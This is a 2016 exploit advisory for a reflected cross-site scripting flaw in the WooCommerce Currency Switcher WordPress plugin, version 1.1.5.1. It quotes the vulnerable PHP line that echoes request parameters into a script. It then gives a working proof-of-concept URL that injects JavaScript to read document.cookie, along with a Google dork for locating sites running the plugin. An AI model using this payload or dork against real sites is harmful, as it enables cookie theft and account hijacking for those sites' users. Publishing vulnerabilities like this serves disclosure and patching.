# Exploit Title: Woocomerce Currency Switcher XSS
# Google Dork: index of /wp-content/plugins/woocomerce-currency-switcher/
# Date: 06 Feb 2016
# Exploit Author: Ben Khlifa Fahmi (from Tuisian Whitehats Security)
# Software Link: https://downloads.wordpress.org/plugin/woocommerce-currency-switcher.zip
# Version: 1.1.5.1


Vulnerable Code : 
Page : /wp-content/plugins/woocomerce-currency-switcher/index.php
Vulnerable Function : wp_head()
Line 765: 
        <?php if (!empty($_GET)): ?>
[-]                woocs_array_of_get = '<?php echo json_encode($_GET); ?>';
        <?php endif; ?>

--------------------------------------

Exploit Link : http://localhost/?s=xss';alert(document.cookie);<!--&post_type=product

--------------------------------------


Special Thanks to all Whitehats Security : Amine Zemzemi , Youssef Werhani , Bilel El Jamii , Bayrem Ghanmi, Charfeddin Hamdi , Med Achref and all our members :D.